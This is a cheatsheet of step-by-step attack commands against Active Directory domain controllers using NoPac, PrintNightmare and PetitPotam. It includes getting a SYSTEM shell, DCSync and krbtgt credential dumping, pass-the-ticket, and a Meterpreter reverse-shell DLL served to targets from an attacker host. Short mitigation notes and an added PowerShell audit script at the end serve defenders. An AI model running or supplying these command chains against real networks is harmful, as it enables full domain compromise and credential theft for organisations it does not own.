Bleeding Edge Vulnerabilities Cheatsheet

NoPac (SamAccountName Spoofing)

Requirements: Standard domain user credentials, ms-DS-MachineAccountQuota > 0

Setup

git clone https://github.com/SecureAuthCorp/impacket.git && cd impacket && python setup.py install
git clone https://github.com/Ridter/noPac.git && cd noPac

Scan

sudo python3 scanner.py DOMAIN/user:pass -dc-ip <DC_IP> -use-ldap

Get Shell (SYSTEM on DC)

sudo python3 noPac.py DOMAIN/user:pass -dc-ip <DC_IP> -dc-host <DC_HOSTNAME> -shell --impersonate administrator -use-ldap

DCSync via NoPac

sudo python3 noPac.py DOMAIN/user:pass -dc-ip <DC_IP> -dc-host <DC_HOSTNAME> --impersonate administrator -use-ldap -dump -just-dc-user DOMAIN/administrator

Pass-the-Ticket with Saved ccache

export KRB5CCNAME=administrator_DC01.DOMAIN.local.ccache
secretsdump.py -just-dc-user DOMAIN/administrator -k -no-pass <DC_FQDN>

PrintNightmare

Requirements: Standard domain user credentials, MS-RPRN/MS-PAR exposed, cube0x0's Impacket fork

Setup

pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket && cd impacket && python3 ./setup.py install
git clone https://github.com/cube0x0/CVE-2021-1675.git

Enumerate

rpcdump.py @<TARGET_IP> | egrep 'MS-RPRN|MS-PAR'

Generate Payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ATTACK_IP> LPORT=8080 -f dll > backupscript.dll

Host Payload

sudo smbserver.py -smb2support CompData /path/to/payload/

Start Handler

msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST <ATTACK_IP>; set LPORT 8080; run"

Exploit

sudo python3 CVE-2021-1675.py DOMAIN/user:pass@<TARGET_IP> '\\<ATTACK_IP>\CompData\backupscript.dll'

PetitPotam (MS-EFSRPC)

Requirements: None (unauthenticated coercion), AD CS with Web Enrollment enabled

Step 1: Relay to AD CS

sudo ntlmrelayx.py -debug -smb2support --target http://<CA_HOST>/certsrv/certfnsh.asp --adcs --template DomainController

Step 2: Coerce DC Authentication

python3 PetitPotam.py <ATTACK_IP> <DC_IP>

Step 3: Request TGT from Certificate

python3 /opt/PKINITtools/gettgtpkinit.py DOMAIN/DC_HOSTNAME\$ -pfx-base64 <BASE64_CERT> dc01.ccache

Step 4: DCSync

export KRB5CCNAME=dc01.ccache
secretsdump.py -just-dc-user DOMAIN/administrator -k -no-pass <DC_FQDN>

Alternate: Get NT Hash via U2U

python3 /opt/PKINITtools/getnthash.py -key <AS-REP_KEY> DOMAIN/DC_HOSTNAME$
secretsdump.py -just-dc-user DOMAIN/administrator "DC_HOSTNAME$"@<DC_IP> -hashes <LM>:<NT>

Windows: Rubeus + Mimikatz

.\Rubeus.exe asktgt /user:DC_HOSTNAME$ /certificate:<BASE64_CERT> /ptt
mimikatz # lsadump::dcsync /user:DOMAIN\krbtgt

Verify Compromise

crackmapexec smb <DC_IP> -u administrator -H <NT_HASH>

Quick Reference

Attack         | Auth        | Tool Chain                                                        | Result
NoPac          | Domain user | scanner.py → noPac.py                                             | SYSTEM shell / DCSync
PrintNightmare | Domain user | rpcdump.py → msfvenom → smbserver.py → CVE-2021-1675.py           | SYSTEM shell (Meterpreter)
PetitPotam     | None        | ntlmrelayx.py → PetitPotam.py → gettgtpkinit.py → secretsdump.py  | DCSync

Mitigations

Attack         | Key Mitigations
NoPac          | Patch CVE-2021-42278/42287, set ms-DS-MachineAccountQuota to 0
PrintNightmare | Patch CVE-2021-34527, disable Print Spooler on DCs if not needed
PetitPotam     | Patch CVE-2021-36942, disable NTLM on DCs/AD CS, Extended Protection for Auth, Require SSL on CA Web Enrollment
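As an added example that is not part of the original cheatsheet, the following PowerShell audits the NoPac and PrintNightmare preconditions listed in the mitigations (ms-DS-MachineAccountQuota and the Spooler service on DCs), lists computer accounts created through the quota, and optionally applies the fix. It assumes the RSAT ActiveDirectory module, Domain Admin rights, WinRM reachability to every DC, and a -Fix switch name chosen here.

```powershell
# Added audit/hardening helper (not from the original page). Assumes RSAT
# ActiveDirectory module, Domain Admin rights and WinRM access to the DCs.
# The -Fix switch is a name chosen for this example.
[CmdletBinding()]
param([switch]$Fix)

Import-Module ActiveDirectory
$domain = Get-ADDomain
$dcs    = Get-ADDomainController -Filter * | Select-Object -ExpandProperty HostName

# NoPac precondition: any authenticated user may add computer accounts
# while ms-DS-MachineAccountQuota is greater than 0.
$maq = (Get-ADObject -Identity $domain.DistinguishedName `
            -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'
Write-Host "ms-DS-MachineAccountQuota = $maq"
if ($maq -gt 0) {
    Write-Warning "Non-admins can create up to $maq machine accounts (NoPac precondition)."
    if ($Fix) {
        Set-ADDomain -Identity $domain.DistinguishedName `
            -Replace @{'ms-DS-MachineAccountQuota' = '0'}
        Write-Host "ms-DS-MachineAccountQuota set to 0"
    }
}

# Computer objects created through the quota record the creator in
# ms-DS-CreatorSID (a byte array); review these for unexpected accounts.
Get-ADComputer -Filter * -Properties 'ms-DS-CreatorSID', whenCreated |
    Where-Object { $_.'ms-DS-CreatorSID' } |
    ForEach-Object {
        $sid = New-Object System.Security.Principal.SecurityIdentifier($_.'ms-DS-CreatorSID', 0)
        [pscustomobject]@{ Computer = $_.Name; CreatorSid = $sid.Value; Created = $_.whenCreated }
    } | Format-Table -AutoSize

# PrintNightmare surface: the Print Spooler service running on a DC.
foreach ($dc in $dcs) {
    $spooler = Invoke-Command -ComputerName $dc -ScriptBlock { Get-Service -Name Spooler }
    Write-Host ("{0}: Spooler {1} ({2})" -f $dc, $spooler.Status, $spooler.StartType)
    if ($spooler.Status -eq 'Running' -or $spooler.StartType -ne 'Disabled') {
        Write-Warning "$dc exposes the Print Spooler; disable it unless the DC must print."
        if ($Fix) {
            Invoke-Command -ComputerName $dc -ScriptBlock {
                Stop-Service -Name Spooler -Force
                Set-Service  -Name Spooler -StartupType Disabled
            }
        }
    }
}
```

Run without -Fix first to review the findings; the patch status for the listed CVEs still has to be confirmed separately through your update management.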